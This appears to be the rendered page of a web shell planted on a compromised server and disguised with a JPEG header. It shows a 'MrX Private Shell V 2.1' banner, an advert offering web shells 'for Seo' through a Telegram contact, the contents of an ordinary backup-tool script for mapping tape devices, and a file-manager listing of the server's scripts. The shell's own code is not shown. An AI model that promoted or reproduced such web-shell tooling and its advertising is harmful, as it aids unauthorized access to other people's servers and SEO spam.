����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Provide the necessary variables to use tape/obdr information
if [[ "$BACKUP_URL" ]] ; then
backup_scheme="$(url_scheme "$BACKUP_URL")"
if [[ "$backup_scheme" == tape || "$backup_scheme" == obdr ]] ; then
testdevice="$(url_path "$BACKUP_URL")"
### Complain when both are specified, but don't match
if [[ "$TAPE_DEVICE" && "$TAPE_DEVICE" != "$testdevice" ]]; then
Error "Tape device in BACKUP_URL '$BACKUP_URL' and TAPE_DEVICE '$TAPE_DEVICE' is not the same"
fi
if [[ -z "$TAPE_DEVICE" ]] ; then
TAPE_DEVICE=$testdevice
fi
fi
fi
if [[ -z "$BACKUP_URL" ]]; then
if [[ "$TAPE_DEVICE" ]] ; then
BACKUP_URL="tape://$TAPE_DEVICE"
fi
fi
if [[ -z "$OUTPUT_URL" ]]; then
if [[ "$TAPE_DEVICE" ]] ; then
OUTPUT_URL="tape://$TAPE_DEVICE"
fi
fi
if [[ "$TAPE_DEVICE" ]]; then
Log "Tape device $TAPE_DEVICE selected."
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 020_cciss_scsi_engage.sh | File | 352 B | 0644 |
|
| 020_translate_url.sh | File | 1.71 KB | 0644 |
|
| 030_translate_tape.sh | File | 932 B | 0644 |
|
| 040_validate_variables.sh | File | 694 B | 0644 |
|
| 050_create_mappings_dir.sh | File | 393 B | 0644 |
|